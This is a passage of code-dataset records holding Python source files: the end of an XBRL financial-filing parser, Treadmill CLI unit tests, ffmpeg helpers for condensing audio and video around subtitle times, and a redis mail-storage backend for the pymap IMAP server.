self.get_xsd_filepath(file_data)\n\n # コンテキストタグ(日付情報)取得\n self.context_tags = self.get_context_tags()\n\n # 管理情報・財務諸表データ取得\n self.xbrl_datas = []\n for (number, ns) in ns_list:\n self.xbrl_datas.append((ns, self.get_xbrl_datas(ns)))\n\n # 変数削除\n del self.root\n return\n\n @staticmethod\n def parse_filename(s):\n \"\"\"ファイル名解析\"\"\"\n # 0 1 2 3 4\n # 01234567890123456789012345678901234567890123456789\n # jpfr-asr-E00000-000-2012-03-31-01-2012-06-22.xbrl\n od = OrderedDict()\n od.update({'会計基準': s[0:4]})\n\n try:\n # 第N期の数字を判定\n t = s[5:8]\n od.update({'報告書': t})\n\n if t == 'asr':\n # 有価証券報告書\n od.update({'第N期': 0})\n elif re_match('^q[1-5]r$', t):\n 
# 四半期報告書\n od.update({'第N期': int(t[1])})\n elif t == 'ssr':\n # 半期報告書\n od.update({'第N期': 2})\n else:\n # 有価証券届出書\n # みなし有価証券届出書\n od.update({'第N期': None})\n\n od.update({'EDINETコード_ファンドコード': s[9:15]})\n od.update({'追番': int(s[16:19])})\n od.update({'報告対象期間期末日': dateutil_parser_parse(s[20:30])})\n od.update({'提出回数': int(s[31:33])})\n od.update({'提出日': dateutil_parser_parse(s[34:44])})\n except ValueError:\n print('不正なファイル名\\n%s' % format_exc())\n od.update({\n '報告書': None, '第N期': None, 'EDINETコード_ファンドコード': None,\n '追番': None, '報告対象期間期末日': None, '提出回数': None, '提出日': None,\n })\n return od\n\n @staticmethod\n def parse_filename_e25850(s):\n \"\"\"ファイル名解析(E25850)\"\"\"\n # 0 1 2 3 4\n # 01234567890123456789012345678901234567890123456789\n # 通常 ifrs-asr-E00000-000-2012-03-31-01-2012-06-22.xbrl\n # 0 1 2 3 4 5\n # 012345678901234567890123456789012345678901234567890123\n # E25850 ifrs-asr-001_E00000-000_2014-12-31_01_2015-03-30.xbrl\n\n od = OrderedDict()\n od.update({'会計基準': s[0:4]})\n\n try:\n # 第N期の数字を判定\n t = s[5:8]\n od.update({'報告書': t})\n\n if t == 'asr':\n # 有価証券報告書\n od.update({'第N期': 0})\n elif re_match('^q[1-5]r$', t):\n # 四半期報告書\n od.update({'第N期': int(t[1])})\n elif t == 'ssr':\n # 半期報告書\n od.update({'第N期': 2})\n else:\n od.update({'第N期': t})\n\n # s[9:12] <- 無視 (不正な文字列)\n\n od.update({'EDINETコード_ファンドコード': s[13:19]})\n od.update({'追番': s[20:23]})\n od.update({'報告対象期間期末日': dateutil_parser_parse(s[24:34])})\n od.update({'提出回数': s[35:37]})\n od.update({'提出日': dateutil_parser_parse(s[38:48])})\n except ValueError:\n print('不正なファイル名\\n%s' % format_exc())\n od.update({\n '報告書': None, '第N期': None, 'EDINETコード_ファンドコード': None,\n '追番': None, '報告対象期間期末日': None, '提出回数': None, '提出日': None,\n })\n else:\n print('ファイル名 再解析 OK')\n return od\n\n def get_xsd_filepath(self, file_data):\n \"\"\"提出者別タクソノミのxsdファイルパス取得\"\"\"\n # xsdファイル名取得\n element = self.root.find('.//%s' % self.link_schema_ref)\n\n if file_data is None:\n # 絶対パス生成\n return os_join(os_dirname(self.file), element.get(self.xlink_href))\n else:\n return os_basename(element.get(self.xlink_href))\n\n def get_context_tags(self):\n \"\"\"contextタグ取得\"\"\"\n od = OrderedDict()\n\n # contextタグ取得\n for element in self.root.findall('.//%s' % self.xbrli_context):\n # id属性の値を取得\n key_id = element.get('id')\n\n # idは重複しないはず\n assert key_id not in od\n \n # id属性をキーにして辞書を作成\n od.update({key_id: OrderedDict()})\n\n # entityタグ取得\n entity = OrderedDict()\n for (n, et_entity) in enumerate(element.findall('.//%s' % self.xbrli_entity), start=1):\n # entityは通常1つ\n assert n == 1\n\n # identifierタグ取得\n entity.update(self.get_identifier_tags(et_entity))\n od[key_id].update({'entity': entity})\n\n # periodタグ取得\n period = OrderedDict()\n for (n, et_period) in enumerate(element.findall('.//%s' % self.xbrli_period), start=1):\n # periodは通常1つ\n assert n == 1\n\n # startDate, endDate, instantタグ取得\n period.update(self.get_date_tags(et_period))\n od[key_id].update({'period': period})\n \n # scenarioタグ取得\n scenario = OrderedDict()\n for (n, et_scenario) in enumerate(element.findall('.//%s' % self.xbrli_scenario), start=1):\n # scenarioは通常1つ\n assert n == 1\n\n if self.info['会計基準'] == 'jpfr':\n # NonConsolidatedタグ取得\n scenario.update(self.get_non_consolidated_tag(et_scenario))\n od[key_id].update({'scenario': scenario})\n elif self.info['会計基準'] == 'ifrs':\n # explicitMemberタグ取得\n scenario.update(self.get_explicit_member_tags(et_scenario))\n od[key_id].update({'scenario': scenario})\n return od\n\n def get_identifier_tags(self, element):\n \"\"\"identifierタグ取得\"\"\"\n od = 
OrderedDict()\n for (n, et_identifier) in enumerate(element.findall('.//%s' % self.xbrli_identifier), start=1):\n # identifierは通常1つ\n assert n == 1\n\n for (name, value) in et_identifier.items():\n od.update({name: value})\n od.update({'text': et_identifier.text})\n return od\n\n def get_date_tags(self, element):\n \"\"\"日付タグ取得\"\"\"\n datas = OrderedDict()\n\n et_start_date = element.find('.//%s' % self.xbrli_start_date)\n if et_start_date is not None:\n # 開始日を追加\n od = OrderedDict()\n for (name, value) in et_start_date.items():\n od.update({name: value})\n od.update({'text': et_start_date.text})\n datas.update({'start_date': od})\n\n # 終了日を追加\n et_end_date = element.find('.//%s' % self.xbrli_end_date)\n\n od = OrderedDict()\n for (name, value) in et_end_date.items():\n od.update({name: value})\n od.update({'text': et_end_date.text})\n datas.update({'end_date': od})\n else:\n # 期末日を追加\n et_instant = element.find('.//%s' % self.xbrli_instant)\n\n od = OrderedDict()\n for (name, value) in et_instant.items():\n od.update({name: value})\n od.update({'text': et_instant.text})\n datas.update({'instant': od})\n return datas\n\n def get_non_consolidated_tag(self, element):\n \"\"\"NonConsolidatedタグ取得\"\"\"\n od = OrderedDict()\n for (n, et_non_consolidated) in enumerate(element.findall('.//%s' % self.jpfr_oe_non_consolidated), start=1):\n # NonConsolidatedは通常1つ\n assert n == 1\n\n # \n # タグ名のみ取り出す\n od.update({'tag': et_non_consolidated.tag.rsplit('}', maxsplit=1)[1]})\n return od\n\n def get_explicit_member_tags(self, element):\n \"\"\"explicitMemberタグ取得\"\"\"\n od = OrderedDict()\n for et_explicit_member in element.findall('.//%s' % self.xbrldi_explicit_member):\n key = et_explicit_member.get('dimension')\n\n assert key not in od\n\n od.update({key: et_explicit_member.attrib})\n od[key].update({'text': et_explicit_member.text})\n return od\n\n def get_xbrl_datas(self, namespace):\n \"\"\"データ取得\"\"\"\n datas = OrderedDict()\n for element in self.root.findall('.//{%s}*' % namespace):\n # tag名、contextRef、idのタプルをキーにして辞書を作成\n key = (element.tag, element.get('contextRef'), element.get('id'))\n data = OrderedDict()\n\n # 属性の内容を追加\n data.update(element.attrib)\n\n # テキストも追加\n data.update({'text': element.text})\n\n if key in datas:\n if data == datas[key]:\n # キーも値も同じなのでスキップ\n continue\n else:\n print('キー重複 %s' % str(key))\n\n # リストに追加\n datas.update({key: data})\n return datas\n","sub_path":"XbrlReader/xbrl_jpfr.py","file_name":"xbrl_jpfr.py","file_ext":"py","file_size_in_byte":13807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390806933","text":"\"\"\"Unit test Treadmill CLI.\n\"\"\"\n\nimport unittest\n\nimport click\nimport click.testing\nimport mock\n\nfrom treadmill import context\nfrom treadmill.cli import configure as configure_cli\nfrom treadmill.cli import discovery as discovery_cli\nfrom treadmill.cli import sproc as sproc_cli\nfrom treadmill.cli.admin import blackout as blackout_cli\nfrom treadmill.cli.admin import show as admin_show_cli\nfrom treadmill.cli.admin import scheduler as scheduler_cli\n\nfrom treadmill.sproc import zk2fs as zk2fs_sproc\n\n\ndef check_help(testcase, args):\n \"\"\"Checks help invocation.\"\"\"\n testcase.assertEqual(\n 0,\n testcase.runner.invoke(testcase.cli, args + ['--help']).exit_code,\n )\n\n\nclass TreadmillShowTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill show' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = admin_show_cli\n self.runner = 
click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n check_help(self, ['--cell', '-', 'pending'])\n\n @mock.patch('treadmill.context.ZkContext._resolve', mock.Mock())\n @mock.patch('kazoo.client.KazooClient.get_children', mock.Mock())\n def test_action(self):\n \"\"\"Test show actions.\"\"\"\n self.runner.invoke(\n self.cli, ['--cell', 'foo', 'running'])\n self.assertEqual(context.GLOBAL.cell, 'foo')\n\n\nclass TreadmillSchedulerTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill scheduler' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = scheduler_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n check_help(self, ['--cell', '-', 'view'])\n check_help(self, ['--cell', '-', 'view', 'allocs'])\n check_help(self, ['--cell', '-', 'view', 'servers'])\n check_help(self, ['--cell', '-', 'view', 'apps'])\n check_help(self, ['--cell', '-', 'view', 'queue'])\n\n @mock.patch('treadmill.context.ZkContext._resolve', mock.Mock())\n @mock.patch('kazoo.client.KazooClient.get_children', mock.Mock())\n def test_action(self):\n \"\"\"Test scheduler commands.\"\"\"\n self.runner.invoke(\n self.cli, ['--cell', 'foo', 'view', 'servers'])\n self.assertEqual(context.GLOBAL.cell, 'foo')\n\n\nclass TreadmillBlackoutTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill blackout' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = blackout_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n check_help(self, ['--cell', '-', 'app'])\n check_help(self, ['--cell', '-', 'server'])\n\n\nclass TreadmillConfigureTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = configure_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n\n\nclass TreadmillDiscoveryTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = discovery_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n\n\nclass TreadmillSprocTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = sproc_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n\n def test_args(self):\n \"\"\"Test passing context arguments.\"\"\"\n self.runner.invoke(\n self.cli, ['--cell', 'foo', 'init', '--help'])\n self.assertEqual(context.GLOBAL.cell, 'foo')\n self.runner.invoke(\n self.cli, ['--cell', 'xxx', '--zookeeper', 'bla',\n 'init', '--help'])\n self.assertEqual(context.GLOBAL.cell, 'xxx')\n self.assertEqual(context.GLOBAL.zk.url, 'bla')\n\n\nclass TreadmillZk2FsTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = zk2fs_sproc\n 
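# Editor's note (hedged): each suite here drives its CLI through click's test\n        # runner; a standalone check mirroring check_help above would be:\n        #     result = click.testing.CliRunner().invoke(self.cli, ['--help'])\n        #     assert result.exit_code == 0\n        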
self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [''])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/treadmill_cli_test.py","file_name":"treadmill_cli_test.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373102241","text":"import ffmpeg\nimport logging\nfrom pathlib import Path\nimport os\nimport tempfile\nimport subprocess\n\n\n# given a stream in the input file, demux the stream and save it into the outfile with some type\ndef ffmpeg_demux(infile: Path, stream_idx: int, outfile: Path):\n # output format is specified via extention on outfile\n logging.debug(f\"demuxing stream {stream_idx} from file {infile} to {outfile}\")\n video = ffmpeg.input(infile)\n stream = video[str(stream_idx)] # don't need 0\n stream = ffmpeg.output(stream, str(outfile))\n stream = ffmpeg.overwrite_output(stream)\n logging.debug(f\"ffmpeg arguments: {ffmpeg.get_args(stream)}\")\n try:\n ffmpeg.run(stream, quiet=logging.getLogger().getEffectiveLevel() >= logging.WARNING) # verbose only\n except ffmpeg.Error as e:\n if e.stderr is None:\n logging.warning(\n f\"Couldn't demux stream {stream_idx} from {infile}, skipping.\")\n return None\n logging.warning(\n f\"Couldn't demux stream {stream_idx} from {infile}, skipping. ffmpeg output: \\n\" + e.stderr.decode(\"utf-8\"))\n return None\n return outfile\n\n\n# from ffmpeg-python _run.py\nclass Error(Exception):\n def __init__(self, cmd, stdout, stderr):\n super(Error, self).__init__(\n '{} error (see stderr output for detail)'.format(cmd)\n )\n self.stdout = stdout\n self.stderr = stderr\n\n\ndef ffmpeg_condense_audio(audiofile, sub_times, outfile=None):\n if outfile is None:\n outfile = \"condensed.flac\"\n # logging.info(f\"saving condensed audio to {outfile}\")\n\n # get samples in audio file\n audio_info = ffmpeg.probe(audiofile, cmd='ffprobe')\n sps = int(\n audio_info['streams'][0]['time_base'].split('/')[1]) # audio samples per second, inverse of sampling frequency\n # samples = audio_info['streams'][0]['duration_ts'] # total samples in audio track\n\n stream = ffmpeg.input(audiofile)\n clips = list()\n for time in sub_times: # times are in milliseconds\n start = int(time[0] * sps / 1000) # convert to sample index\n end = int(time[1] * sps / 1000)\n # use start_pts for sample/millisecond level precision\n clips.append(stream.audio.filter('atrim', start_pts=start, end_pts=end).filter('asetpts', 'PTS-STARTPTS'))\n combined = ffmpeg.concat(*clips, a=1, v=0)\n if os.path.splitext(outfile)[1] == \".mp3\":\n combined = ffmpeg.output(combined, outfile, audio_bitrate='320k') # todo: make this user-settable\n else:\n combined = ffmpeg.output(combined, outfile)\n combined = ffmpeg.overwrite_output(combined)\n logging.debug(f\"ffmpeg arguments: {' '.join(ffmpeg.get_args(combined))}\")\n args = ffmpeg.get_args(combined)\n if len(\"ffmpeg \" + \" \".join(args)) > 32766 and os.name == 'nt':\n logging.warning(\"Arguments passed to ffmpeg exceeds 32767 characters while running on a Windows system. 
\"\n \"Will try using a temporary file to pass filter_complex arguments to ffmpeg.\")\n idx = args.index(\"-filter_complex\") + 1\n complex_filter = str(args[idx])\n # write complex_filter to a temporary file\n fp = tempfile.NamedTemporaryFile(delete=False) # don't delete b/c can't open file again when it's already open in windows, need to close first\n fp.write(complex_filter.encode(encoding=\"utf-8\"))\n fp.close()\n args[idx] = fp.name\n args[idx - 1] = \"-filter_complex_script\"\n args = [\"ffmpeg\"] + args\n\n # ffmpeg.run(combined, quiet=logging.getLogger().getEffectiveLevel() >= logging.WARNING)\n\n pipe_stdin = False\n pipe_stdout = False\n pipe_stderr = False\n quiet = logging.getLogger().getEffectiveLevel() >= logging.WARNING\n\n stdin_stream = subprocess.PIPE if pipe_stdin else None\n stdout_stream = subprocess.PIPE if pipe_stdout or quiet else None\n stderr_stream = subprocess.PIPE if pipe_stderr or quiet else None\n process = subprocess.Popen(\n args, stdin=stdin_stream, stdout=stdout_stream, stderr=stderr_stream\n )\n out, err = process.communicate(input)\n retcode = process.poll()\n if retcode:\n raise Error('ffmpeg', out, err)\n\n\ndef export_condensed_audio(divided_times, audiofile: Path, outfile=None, use_absolute_numbering=False):\n # outfile is full path with extension\n audiofile = str(audiofile)\n if outfile is not None:\n outfile = str(outfile)\n\n if outfile is None: # no output path given, use audiofile path\n outfile = audiofile\n elif outfile[0] == '.' and outfile[1:].isalnum(): # outfile is just an extension, use audiofile for path\n # extension = outfile\n outfile = os.path.splitext(audiofile)[0] + outfile\n else: # outfile is already full path with extension\n pass\n idx = 0\n for p, partition in enumerate(divided_times):\n if len(partition) == 0:\n continue\n for s, split in enumerate(partition):\n if len(split) == 0:\n continue\n idx += 1\n if use_absolute_numbering: # todo: remove outfile naming from this function\n outfilesplit = os.path.splitext(outfile)[0] + \\\n f\".pt{idx}\" + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n else:\n outfilesplit = os.path.splitext(outfile)[0] + \\\n (f\".p{p + 1}\" if len(divided_times) != 1 else \"\") + \\\n (f\".s{s + 1}\" if len(partition) != 1 else \"\") + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n\n ffmpeg_condense_audio(audiofile=audiofile, sub_times=split, outfile=outfilesplit)\n\n\ndef export_condensed_video(divided_times, audiofile: Path, subfile: Path, videofile: Path, outfile=None,\n use_absolute_numbering=False):\n # outfile is full path with extension\n audiofile = str(audiofile)\n if outfile is not None:\n outfile = str(outfile)\n\n if outfile is None: # no output path given, use audiofile path\n outfile = audiofile\n elif outfile[0] == '.' 
and outfile[1:].isalnum(): # outfile is just an extension, use audiofile for path\n # extension = outfile\n outfile = os.path.splitext(audiofile)[0] + outfile\n else: # outfile is already full path with extension\n pass\n idx = 0\n for p, partition in enumerate(divided_times):\n if len(partition) == 0:\n continue\n for s, split in enumerate(partition):\n if len(split) == 0:\n continue\n idx += 1\n if use_absolute_numbering:\n outfilesplit = os.path.splitext(outfile)[0] + \\\n f\".pt{idx}\" + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n else:\n outfilesplit = os.path.splitext(outfile)[0] + \\\n (f\".p{p + 1}\" if len(divided_times) != 1 else \"\") + \\\n (f\".s{s + 1}\" if len(partition) != 1 else \"\") + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n\n ffmpeg_condense_video(audiofile=audiofile, videofile=videofile, subfile=subfile,\n sub_times=split, outfile=outfilesplit)\n\n\ndef trim(input_path, output_path, start=30, end=60):\n input_stream = ffmpeg.input(input_path)\n\n vid = (\n input_stream.video\n .trim(start=start, end=end)\n .setpts('PTS-STARTPTS')\n )\n aud = (\n input_stream.audio\n .filter_('atrim', start=start, end=end)\n .filter_('asetpts', 'PTS-STARTPTS')\n )\n\n joined = ffmpeg.concat(vid, aud, v=1, a=1).node\n output = ffmpeg.output(joined[0], joined[1], output_path)\n output.run()\n\n\ndef ffmpeg_condense_video(audiofile, videofile, subfile, sub_times, outfile):\n logging.info(f\"saving condensed video to {outfile}\")\n\n # get samples in audio file\n audio_info = ffmpeg.probe(audiofile, cmd='ffprobe')\n sps = int(\n audio_info['streams'][0]['time_base'].split('/')[1]) # audio samples per second, inverse of sampling frequency\n # samples = audio_info['streams'][0]['duration_ts'] # total samples in audio track\n\n audiostream = ffmpeg.input(audiofile)\n videostream = ffmpeg.input(videofile)\n vid = videostream.video.filter_multi_output('split')\n # sub = videostream['s'].filter_multi_output('split')\n aud = audiostream.audio.filter_multi_output('asplit')\n\n clips = []\n for idx, time in enumerate(sub_times): # times are in milliseconds\n # start = int(time[0] * sps / 1000) # convert to sample index\n # end = int(time[1] * sps / 1000)\n start = time[0] / 1000\n end = time[1] / 1000\n # use start_pts for sample/millisecond level precision\n\n a = aud[idx].filter('atrim', start=start, end=end).filter('asetpts', expr='PTS-STARTPTS')\n v = vid[idx].trim(start=start, end=end).setpts('PTS-STARTPTS')\n # s = sub[idx].trim(start=start, end=end).setpts('PTS-STARTPTS')\n clips.extend((v, a))\n\n out = ffmpeg.concat(\n *clips,\n v=1,\n a=1\n ).output(outfile)\n # output = ffmpeg.output(joined[0], joined[1], outfile)\n out = ffmpeg.overwrite_output(out)\n logging.debug(f\"ffmpeg arguments: {ffmpeg.get_args(out)}\")\n ffmpeg.run(out, quiet=logging.getLogger().getEffectiveLevel() >= logging.WARNING)\n","sub_path":"subs2cia/ffmpeg_tools.py","file_name":"ffmpeg_tools.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"374440454","text":"\nfrom __future__ import annotations\n\nimport json\nimport uuid\nfrom argparse import ArgumentParser, Namespace\nfrom collections.abc import Awaitable, Callable, Mapping, AsyncIterator\nfrom contextlib import closing, asynccontextmanager, AsyncExitStack\nfrom datetime import datetime\nfrom functools import partial\nfrom secrets import token_bytes\nfrom typing import Any, Optional, Final\n\nfrom aioredis import create_redis, Redis, 
ConnectionClosedError\nfrom pysasl.creds import AuthenticationCredentials\n\nfrom pymap.bytes import BytesFormat\nfrom pymap.config import BackendCapability, IMAPConfig\nfrom pymap.context import connection_exit\nfrom pymap.exceptions import AuthorizationFailure, IncompatibleData, \\\n NotAllowedError, UserNotFound\nfrom pymap.health import HealthStatus\nfrom pymap.interfaces.backend import BackendInterface\nfrom pymap.interfaces.login import LoginInterface, IdentityInterface\nfrom pymap.interfaces.token import TokensInterface\nfrom pymap.token import AllTokens\nfrom pymap.user import UserMetadata\n\nfrom .cleanup import CleanupTask\nfrom .filter import FilterSet\nfrom .keys import DATA_VERSION, RedisKey, GlobalKeys, CleanupKeys, \\\n NamespaceKeys\nfrom .mailbox import Message, MailboxSet\nfrom ..session import BaseSession\n\n__all__ = ['RedisBackend', 'Config', 'Session']\n\n\nclass RedisBackend(BackendInterface):\n \"\"\"Defines a backend that uses redis data structures for mailbox storage.\n\n \"\"\"\n\n def __init__(self, login: Login, config: Config,\n status: HealthStatus) -> None:\n super().__init__()\n self._login = login\n self._config = config\n self._status = status\n\n @property\n def login(self) -> Login:\n return self._login\n\n @property\n def config(self) -> Config:\n return self._config\n\n @property\n def status(self) -> HealthStatus:\n return self._status\n\n @classmethod\n def add_subparser(cls, name: str, subparsers: Any) -> ArgumentParser:\n parser = subparsers.add_parser(name, help='redis backend')\n parser.add_argument('--address', metavar='URL',\n default='redis://localhost',\n help='the redis server address')\n parser.add_argument('--select', metavar='DB', type=int,\n help='the redis database for mail data')\n parser.add_argument('--separator', metavar='CHAR', default='/',\n help='the redis key segment separator')\n parser.add_argument('--prefix', metavar='VAL', default='/mail',\n help='the mail data key prefix')\n parser.add_argument('--users-prefix', metavar='VAL', default='/users',\n help='the user lookup key prefix')\n parser.add_argument('--users-json', action='store_true',\n help='the user lookup value contains JSON')\n return parser\n\n @classmethod\n async def init(cls, args: Namespace, **overrides: Any) \\\n -> tuple[RedisBackend, Config]:\n config = Config.from_args(args)\n status = HealthStatus()\n connect_redis = partial(cls._connect_redis, config, status)\n login = Login(config, connect_redis)\n return cls(login, config, status), config\n\n @classmethod\n async def _connect_redis(cls, config: Config,\n status: HealthStatus) -> Redis:\n try:\n redis = await create_redis(config.address)\n except (ConnectionClosedError, OSError):\n status.set_unhealthy()\n raise\n else:\n status.set_healthy()\n stack = connection_exit.get()\n stack.enter_context(closing(redis))\n return redis\n\n async def start(self, stack: AsyncExitStack) -> None:\n config = self._config\n global_keys = config._global_keys\n connect_redis = partial(self._connect_redis, config, self._status)\n cleanup_task = CleanupTask(connect_redis, global_keys).start()\n stack.callback(cleanup_task.cancel)\n\n\nclass Config(IMAPConfig):\n \"\"\"The config implementation for the redis backend.\n\n Args:\n args: The command-line arguments.\n address: The redis server address.\n select: The redis database for mail data.\n separator: The redis key segment separator.\n prefix: The prefix for mail data keys.\n users_prefix: The user lookup key prefix.\n users_json: True if the user lookup value contains 
JSON.\n\n \"\"\"\n\n def __init__(self, args: Namespace, *, address: str, select: Optional[int],\n separator: bytes, prefix: bytes, users_prefix: bytes,\n users_json: bool, **extra: Any) -> None:\n super().__init__(args, admin_key=token_bytes(), **extra)\n self._address = address\n self._select = select\n self._separator = separator\n self._prefix = prefix\n self._users_prefix = users_prefix\n self._users_json = users_json\n\n @property\n def backend_capability(self) -> BackendCapability:\n return BackendCapability(idle=True, object_id=True, multi_append=True)\n\n @property\n def address(self) -> str:\n \"\"\"The redis server address. Defaults to a connection to localhost.\n\n See Also:\n :func:`aioredis.create_connection`\n\n \"\"\"\n return self._address\n\n @property\n def select(self) -> Optional[int]:\n \"\"\"The redis database for mail data. If given, the `SELECT`_ command is\n called after successful user lookup.\n\n .. _SELECT: https://redis.io/commands/select\n\n \"\"\"\n return self._select\n\n @property\n def separator(self) -> bytes:\n \"\"\"The bytestring used to separate segments of composite redis keys.\"\"\"\n return self._separator\n\n @property\n def prefix(self) -> bytes:\n \"\"\"The prefix for mail data keys. This prefix does not apply to\n :attr:`.users_key`.\n\n \"\"\"\n return self._prefix\n\n @property\n def users_prefix(self) -> bytes:\n \"\"\"The prefix for user lookup keys.\"\"\"\n return self._users_prefix\n\n @property\n def users_json(self) -> bool:\n \"\"\"True if the value from the user lookup key contains a JSON object\n with a ``\"password\"`` attribute, instead of a redis hash with a\n ``password`` key.\n\n See Also:\n `redis hashes\n `_\n\n \"\"\"\n return self._users_json\n\n @property\n def _joiner(self) -> BytesFormat:\n return BytesFormat(self.separator)\n\n @property\n def _users_root(self) -> RedisKey:\n return RedisKey(self._joiner, [self.users_prefix], {})\n\n @property\n def _global_keys(self) -> GlobalKeys:\n key = RedisKey(self._joiner, [self.prefix], {})\n return GlobalKeys(key)\n\n @classmethod\n def parse_args(cls, args: Namespace) -> Mapping[str, Any]:\n return {**super().parse_args(args),\n 'address': args.address,\n 'select': args.select,\n 'separator': args.separator.encode('utf-8'),\n 'prefix': args.prefix.encode('utf-8'),\n 'users_prefix': args.users_prefix.encode('utf-8'),\n 'users_json': args.users_json}\n\n\nclass Session(BaseSession[Message]):\n \"\"\"The session implementation for the redis backend.\"\"\"\n\n resource = __name__\n\n def __init__(self, redis: Redis, owner: str, config: Config,\n mailbox_set: MailboxSet, filter_set: FilterSet) -> None:\n super().__init__(owner)\n self._redis = redis\n self._config = config\n self._mailbox_set = mailbox_set\n self._filter_set = filter_set\n\n @property\n def config(self) -> IMAPConfig:\n return self._config\n\n @property\n def mailbox_set(self) -> MailboxSet:\n return self._mailbox_set\n\n @property\n def filter_set(self) -> FilterSet:\n return self._filter_set\n\n\nclass Login(LoginInterface):\n \"\"\"The login implementation for the redis backend.\"\"\"\n\n def __init__(self, config: Config,\n connect_redis: Callable[[], Awaitable[Redis]]) -> None:\n super().__init__()\n self._config = config\n self._connect_redis = connect_redis\n self._tokens = AllTokens()\n\n @property\n def tokens(self) -> TokensInterface:\n return self._tokens\n\n async def authenticate(self, credentials: AuthenticationCredentials) \\\n -> Identity:\n config = self._config\n redis = await 
self._connect_redis()\n authcid = credentials.authcid\n token_key: Optional[bytes] = None\n role: Optional[str] = None\n if credentials.authcid_type == 'admin-token':\n authcid = credentials.identity\n role = 'admin'\n try:\n authcid_identity = Identity(config, self.tokens, redis, authcid)\n metadata = await authcid_identity.get()\n except UserNotFound:\n metadata = UserMetadata(config)\n if 'key' in metadata.params:\n token_key = bytes.fromhex(metadata.params['key'])\n role = role or metadata.role\n await metadata.check_password(credentials, token_key=token_key)\n if role != 'admin' and authcid != credentials.identity:\n raise AuthorizationFailure()\n return Identity(config, self.tokens, redis, credentials.identity, role)\n\n\nclass Identity(IdentityInterface):\n \"\"\"The identity implementation for the redis backend.\"\"\"\n\n def __init__(self, config: Config, tokens: TokensInterface,\n redis: Redis, name: str, role: str = None) -> None:\n super().__init__()\n self.config: Final = config\n self.tokens: Final = tokens\n self._redis: Optional[Redis] = redis\n self._name = name\n self._role = role\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def redis(self) -> Redis:\n redis = self._redis\n if redis is None:\n # Other methods may not be called after new_session(), since it\n # may have called SELECT on the connection.\n raise RuntimeError()\n return redis\n\n async def new_token(self, *, expiration: datetime = None) -> Optional[str]:\n metadata = await self.get()\n if 'key' not in metadata.params:\n return None\n key = bytes.fromhex(metadata.params['key'])\n return self.tokens.get_login_token(self.name, key)\n\n @asynccontextmanager\n async def new_session(self) -> AsyncIterator[Session]:\n config = self.config\n redis = self.redis\n self._redis = None\n if config.select is not None:\n await redis.select(config.select)\n global_keys = config._global_keys\n namespace = await self._get_namespace(redis, global_keys, self.name)\n ns_keys = NamespaceKeys(global_keys, namespace)\n cl_keys = CleanupKeys(global_keys)\n mailbox_set = MailboxSet(redis, ns_keys, cl_keys)\n filter_set = FilterSet(redis, ns_keys)\n try:\n await mailbox_set.add_mailbox('INBOX')\n except ValueError:\n pass\n yield Session(redis, self.name, config, mailbox_set, filter_set)\n\n async def _get_namespace(self, redis: Redis, global_keys: GlobalKeys,\n user: str) -> bytes:\n user_key = user.encode('utf-8')\n new_namespace = uuid.uuid4().hex.encode('ascii')\n ns_val = b'%d/%b' % (DATA_VERSION, new_namespace)\n multi = redis.multi_exec()\n multi.hsetnx(global_keys.namespaces, user_key, ns_val)\n multi.hget(global_keys.namespaces, user_key)\n _, ns_val = await multi.execute()\n version, namespace = ns_val.split(b'/', 1)\n if int(version) != DATA_VERSION:\n raise IncompatibleData()\n return namespace\n\n async def get(self) -> UserMetadata:\n redis = self.redis\n user_bytes = self.name.encode('utf-8')\n user_key = self.config._users_root.end(user_bytes)\n if self.config.users_json:\n json_data = await redis.get(user_key)\n if json_data is None:\n raise UserNotFound(self.name)\n data_dict = json.loads(json_data)\n else:\n data_dict = await redis.hgetall(user_key, encoding='utf-8')\n if data_dict is None:\n raise UserNotFound(self.name)\n return 